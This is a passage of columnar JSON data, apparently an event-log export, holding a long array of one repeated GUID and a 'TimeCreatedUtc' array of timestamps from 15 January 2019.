d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\"],\"TimeCreatedUtc\":[\"2019-01-15 05:24:24.010\",\"2019-01-15 05:24:24.023\",\"2019-01-15 05:24:25.807\",\"2019-01-15 05:24:26.010\",\"2019-01-15 05:07:26.003\",\"2019-01-15 05:08:24.013\",\"2019-01-15 05:08:24.030\",\"2019-01-15 05:08:25.717\",\"2019-01-15 05:08:26.007\",\"2019-01-15 05:09:26.010\",\"2019-01-15 05:10:24.000\",\"2019-01-15 05:10:24.047\",\"2019-01-15 05:10:25.653\",\"2019-01-15 05:10:26.000\",\"2019-01-15 05:20:24.000\",\"2019-01-15 05:20:24.017\",\"2019-01-15 05:20:25.337\",\"2019-01-15 05:20:26.017\",\"2019-01-15 05:21:26.003\",\"2019-01-15 05:17:26.000\",\"2019-01-15 05:18:24.010\",\"2019-01-15 05:18:24.027\",\"2019-01-15 05:18:25.407\",\"2019-01-15 05:18:26.010\",\"2019-01-15 05:19:26.000\",\"2019-01-15 04:47:26.000\",\"2019-01-15 04:48:24.013\",\"2019-01-15 04:48:24.030\",\"2019-01-15 04:48:25.743\",\"2019-01-15 04:48:26.017\",\"2019-01-15 04:39:26.000\",\"2019-01-15 04:40:24.013\",\"2019-01-15 04:40:24.027\",\"2019-01-15 04:40:25.393\",\"2019-01-15 04:40:26.000\",\"2019-01-15 04:37:26.007\",\"2019-01-15 04:38:24.000\",\"2019-01-15 04:38:24.020\",\"2019-01-15 04:38:25.453\",\"2019-01-15 04:38:26.017\",\"2019-01-15 04:17:26.000\",\"2019-01-15 04:18:24.003\",\"2019-01-15 04:18:24.020\",\"2019-01-15 04:18:25.490\",\"2019-01-15 04:18:26.010\",\"2019-01-15 05:13:26.007\",\"2019-01-15 05:15:16.167\",\"2019-01-15 05:15:16.277\",\"2019-01-15 05:15:16.340\",\"2019-01-15 05:15:16.353\",\"2019-01-15 05:15:16.400\",\"2019-01-15 05:15:16.430\",\"2019-01-15 05:15:16.447\",\"2019-01-15 05:15:16.500\",\"2019-01-15 05:15:16.510\",\"2019-01-15 05:15:16.520\",\"2019-01-15 05:15:16.563\",\"2019-01-15 05:15:16.613\",\"2019-01-15 05:15:16.663\",\"2019-01-15 05:15:16.677\",\"2019-01-15 05:15:16.720\",\"2019-01-15 05:15:16.767\",\"2019-01-15 05:15:16.807\",\"2019-01-15 05:15:16.850\",\"2019-01-15 05:15:16.893\",\"2019-01-15 05:15:16.967\",\"2019-01-15 05:15:17.020\",\"2019-01-15 05:15:17.077\",\"2019-01-15 05:15:17.127\",\"2019-01-15 05:15:17.137\",\"2019-01-15 05:14:24.003\",\"2019-01-15 05:14:24.023\",\"2019-01-15 05:14:25.517\",\"2019-01-15 05:14:26.013\",\"2019-01-15 05:15:03.017\",\"2019-01-15 05:15:03.047\",\"2019-01-15 05:15:03.057\",\"2019-01-15 05:15:03.247\",\"2019-01-15 05:15:03.257\",\"2019-01-15 05:15:03.390\",\"2019-01-15 05:15:03.410\",\"2019-01-15 05:15:03.503\",\"2019-01-15 05:15:03.517\",\"2019-01-15 05:15:03.543\",\"2019-01-15 05:15:03.550\",\"2019-01-15 05:15:03.830\",\"2019-01-15 05:15:03.850\",\"2019-01-15 05:15:04.507\",\"2019-01-15 05:15:05.193\",\"2019-01-15 05:15:08.723\",\"2019-01-15 05:15:10.667\",\"2019-01-15 05:15:10.683\",\"2019-01-15 05:15:10.707\",\"2019-01-15 05:15:10.730\",\"2019-01-15 05:15:10.753\",\"2019-01-15 05:15:10.817\",\"2019-01-15 05:15:11.190\",\"2019-01-15 05:15:11.260\",\"2019-01-15 05:15:11.347\",\"2019-01-15 05:15:11.413\",\"2019-01-15 05:15:11.493\",\"2019-01-15 05:15:11.537\",\"2019-01-15 05:15:11.617\",\"2019-01-15 05:15:12.930\",\"2019-01-15 05:15:12.977\",\"2019-01-15 05:15:13.053\",\"2019-01-15 05:15:13.100\",\"2019-01-15 05:15:13.173\",\"2019-01-15 05:15:13.220\",\"2019-01-15 05:15:13.287\",\"2019-01-15 05:15:13.337\",\"2019-01-15 05:15:13.407\",\"2019-01-15 05:15:13.453\",\"2019-01-15 05:15:13.517\",\"2019-01-15 05:15:13.567\",\"2019-01-15 05:15:13.633\",\"2019-01-15 05:15:13.683\",\"2019-01-15 05:15:13.747\",\"2019-01-15 05:15:13.793\",\"2019-01-15 05:15:13.867\",\"2019-01-15 05:15:11.767\",\"2019-01-15 05:15:11.833\",\"2019-01-15 05:15:11.947\",\"2019-01-15 05:15:12.003\",\"2019-01-15 05:15:12.067\",\"2019-01-15 05:15:12.123\",\"2019-01-15 05:15:12.160\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.167\",\"2019-01-15 05:15:12.337\",\"2019-01-15 05:15:12.393\",\"2019-01-15 05:15:12.460\",\"2019-01-15 05:15:12.513\",\"2019-01-15 04:35:15.673\",\"2019-01-15 04:35:16.060\",\"2019-01-15 04:35:26.010\",\"2019-01-15 05:15:12.610\",\"2019-01-15 05:15:12.670\",\"2019-01-15 05:15:12.740\",\"2019-01-15 05:15:12.847\",\"2019-01-15 05:15:15.160\",\"2019-01-15 05:15:15.183\",\"2019-01-15 05:15:15.233\",\"2019-01-15 05:15:15.283\",\"2019-01-15 05:15:15.317\",\"2019-01-15 05:15:15.440\",\"2019-01-15 05:15:15.457\",\"2019-01-15 05:15:15.483\",\"2019-01-15 05:15:15.500\",\"2019-01-15 05:15:15.520\",\"2019-01-15 05:15:15.533\",\"2019-01-15 05:15:15.553\",\"2019-01-15 05:15:15.570\",\"2019-01-15 05:15:15.620\",\"2019-01-15 05:15:15.677\",\"2019-01-15 05:15:15.727\",\"2019-01-15 05:15:15.777\",\"2019-01-15 05:15:15.827\",\"2019-01-15 05:15:15.880\",\"2019-01-15 05:15:15.923\",\"2019-01-15 05:15:15.950\",\"2019-01-15 05:15:15.967\",\"2019-01-15 05:15:16.020\",\"2019-01-15 05:15:16.067\",\"2019-01-15 05:15:16.117\",\"2019-01-15 05:15:17.217\",\"2019-01-15 05:15:17.220\",\"2019-01-15 05:15:17.257\",\"2019-01-15 05:15:17.363\",\"2019-01-15 05:15:17.410\",\"2019-01-15 05:15:17.457\",\"2019-01-15 05:15:17.493\",\"2019-01-15 05:15:17.520\",\"2019-01-15 05:15:17.570\",\"2019-01-15 05:15:17.580\",\"2019-01-15 05:15:17.650\",\"2019-01-15 05:15:18.080\",\"2019-01-15 05:15:18.147\",\"2019-01-15 05:15:18.230\",\"2019-01-15 04:36:24.010\",\"2019-01-15 04:36:24.027\",\"2019-01-15 04:36:25.517\",\"2019-01-15 04:36:26.000\",\"2019-01-15 04:49:26.010\",\"2019-01-15 04:50:24.000\",\"2019-01-15 04:50:24.017\",\"2019-01-15 04:50:25.693\",\"2019-01-15 04:50:26.010\",\"2019-01-15 04:33:26.003\",\"2019-01-15 04:33:32.463\",\"2019-01-15 05:15:18.287\",\"2019-01-15 05:15:18.300\",\"2019-01-15 05:15:18.320\",\"2019-01-15 05:15:18.337\",\"2019-01-15 05:15:18.403\",\"2019-01-15 05:15:18.450\",\"2019-01-15 05:15:18.500\",\"2019-01-15 05:15:18.547\",\"2019-01-15 05:15:18.553\",\"2019-01-15 05:15:18.630\",\"2019-01-15 05:15:18.670\",\"2019-01-15 05:15:18.707\",\"2019-01-15 05:15:18.770\",\"2019-01-15 05:15:18.820\",\"2019-01-15 05:15:18.867\",\"2019-01-15 05:15:18.917\",\"2019-01-15 05:15:18.967\",\"2019-01-15 05:15:19.010\",\"2019-01-15 05:15:19.060\",\"2019-01-15 05:15:19.127\",\"2019-01-15 05:15:19.180\",\"2019-01-15 05:15:19.223\",\"2019-01-15 05:15:19.337\",\"2019-01-15 05:15:19.403\",\"2019-01-15 05:15:19.447\",\"2019-01-15 05:15:19.490\",\"2019-01-15 05:15:19.537\",\"2019-01-15 05:15:19.583\",\"2019-01-15 05:15:19.617\",\"2019-01-15 05:15:20.623\",\"2019-01-15 05:15:26.013\",\"2019-01-15 05:15:14.033\",\"2019-01-15 05:15:14.100\",\"2019-01-15 05:15:14.157\",\"2019-01-15 05:15:14.227\",\"2019-01-15 05:15:14.293\",\"2019-01-15 05:15:14.377\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.453\",\"2019-01-15 05:15:14.490\",\"2019-01-15 05:15:14.493\",\"2019-01-15 05:15:14.563\",\"2019-01-15 05:15:14.613\",\"2019-01-15 05:15:14.640\",\"2019-01-15 05:15:14.693\",\"2019-01-15 05:15:14.770\",\"2019-01-15 05:05:26.000\",\"2019-01-15 05:06:24.000\",\"2019-01-15 05:06:24.043\",\"2019-01-15 05:06:25.770\",\"2019-01-15 05:06:26.000\",\"2019-01-15 04:34:24.010\",\"2019-01-15 04:34:24.030\",\"2019-01-15 04:34:25.583\",\"2019-01-15 04:34:26.000\",\"2019-01-15 04:25:26.000\",\"2019-01-15 04:26:24.000\",\"2019-01-15 04:26:24.017\",\"2019-01-15 04:26:25.833\",\"2019-01-15 04:26:26.007\",\"2019-01-15 04:41:26.000\",\"2019-01-15 04:42:24.000\",\"2019-01-15 04:42:24.017\",\"2019-01-15 04:42:25.387\",\"2019-01-15 04:42:25.437\",\"2019-01-15 04:42:26.007\",\"2019-01-15 04:43:05.240\",\"2019-01-15 04:43:05.253\",\"2019-01-15 04:43:26.000\",\"2019-01-15 04:19:26.000\",\"2019-01-15 04:20:24.000\",\"2019-01-15 04:20:24.017\",\"2019-01-15 04:20:25.423\",\"2019-01-15 04:20:26.007\",\"2019-01-15 04:31:26.000\",\"2019-01-15 04:32:24.010\",\"2019-01-15 04:32:24.027\",\"2019-01-15 04:32:25.650\",\"2019-01-15 04:32:26.000\",\"2019-01-15 04:27:26.000\",\"2019-01-15 04:28:01.517\",\"2019-01-15 04:28:24.003\",\"2019-01-15 04:28:24.020\",\"2019-01-15 04:28:25.770\",\"2019-01-15 04:28:26.013\",\"2019-01-15 04:28:33.090\",\"2019-01-15 05:11:26.000\",\"2019-01-15 05:12:24.007\",\"2019-01-15 05:12:24.023\",\"2019-01-15 05:12:25.403\",\"2019-01-15 05:12:25.590\",\"2019-01-15 